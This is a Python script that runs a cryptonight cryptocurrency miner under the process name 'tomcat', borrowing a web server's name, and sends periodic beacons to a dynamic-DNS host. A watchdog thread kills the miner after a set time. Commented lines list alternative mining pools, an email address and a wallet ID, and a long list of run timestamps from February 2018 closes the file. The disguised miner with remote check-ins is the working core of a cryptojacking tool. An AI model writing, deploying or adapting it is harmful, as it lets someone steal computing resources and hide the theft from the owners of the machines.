import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:13:03.978505
#2018-02-17 15:59:06.754964
#2018-02-17 17:47:06.638022
#2018-02-17 19:33:07.216063
#2018-02-17 21:21:05.523317
#2018-02-17 23:05:06.719782
#2018-02-18 00:52:05.215537
#2018-02-18 02:41:07.242572
#2018-02-18 04:29:07.363554
#2018-02-18 06:21:05.629358
#2018-02-18 08:10:07.596897
#2018-02-18 09:58:05.888563
#2018-02-18 11:45:08.154045
#2018-02-18 13:31:06.016060
#2018-02-18 15:21:06.313156
#2018-02-18 17:10:07.452924
#2018-02-18 18:58:05.691680
#2018-02-18 20:45:07.518359
#2018-02-18 22:31:05.786593
#2018-02-19 00:19:06.049957
#2018-02-19 02:05:01.367252
#2018-02-19 03:51:07.437786
#2018-02-19 05:36:01.844613
#2018-02-19 07:25:01.395869
#2018-02-19 09:14:07.074196
#2018-02-19 11:05:04.640100
#2018-02-19 12:52:06.744493
#2018-02-19 14:39:09.430401
#2018-02-19 16:28:04.468089
#2018-02-19 18:15:07.619784
#2018-02-19 20:02:08.839080
#2018-02-19 21:52:01.257634
#2018-02-19 23:38:01.263988
#2018-02-20 01:24:01.902849
#2018-02-20 03:14:02.015728
#2018-02-20 05:01:06.736777
#2018-02-20 06:44:08.877979
#2018-02-20 08:31:06.998349
#2018-02-20 10:15:04.888259
#2018-02-20 11:59:01.667699
#2018-02-20 13:46:01.735509
#2018-02-20 15:30:08.933729
#2018-02-20 17:15:13.444300
#2018-02-20 19:04:08.940221
#2018-02-20 20:52:06.256081
#2018-02-20 22:38:02.014039
#2018-02-21 00:19:04.921942
#2018-02-21 02:05:07.968336
#2018-02-21 03:52:01.680640
#2018-02-21 05:39:01.810832
#2018-02-21 07:27:05.261855
#2018-02-21 09:11:06.677167
#2018-02-21 11:00:05.650279
#2018-02-21 12:47:06.115602
#2018-02-21 14:35:07.864728
#2018-02-21 16:22:05.383276
#2018-02-21 18:13:06.990172
#2018-02-21 19:59:08.452472
#2018-02-21 21:47:10.425282
#2018-02-21 23:35:03.007773
#2018-02-22 01:24:02.161012
#2018-02-22 03:13:04.613712
#2018-02-22 05:01:06.550121
#2018-02-22 06:44:05.094583
#2018-02-22 08:32:06.135921
#2018-02-22 10:18:08.352281
#2018-02-22 12:03:01.540794
#2018-02-22 13:49:04.836590
#2018-02-22 15:38:01.666497
#2018-02-22 17:24:01.531733
#2018-02-22 19:13:06.695754
#2018-02-22 21:04:01.827280
#2018-02-22 22:52:02.216515
#2018-02-23 00:40:05.910454
#2018-02-23 02:26:08.785904
#2018-02-23 04:16:04.072857
#2018-02-23 06:03:07.534695
#2018-02-23 07:48:06.880855
#2018-02-23 09:50:08.951570
#2018-02-23 11:49:06.869682
#2018-02-23 13:39:06.414598
#2018-02-23 15:27:06.065952
#2018-02-23 17:17:08.721741
#2018-02-23 19:03:01.656415
#2018-02-23 20:48:05.347633
#2018-02-23 22:34:04.621922
#2018-02-24 00:20:03.876812
#2018-02-24 02:13:05.827005
#2018-02-24 04:02:01.892912
#2018-02-24 06:43:06.054232
#2018-02-24 08:34:06.459578
#2018-02-24 10:20:03.831318
#2018-02-24 12:15:08.996216
#2018-02-24 14:04:07.309485
#2018-02-24 15:53:02.064743
#2018-02-24 17:47:03.684998
#2018-02-24 19:35:05.872643
#2018-02-24 21:22:04.349027
#2018-02-25 00:03:04.544090
#2018-02-25 03:18:01.636003
#2018-02-25 07:06:05.977892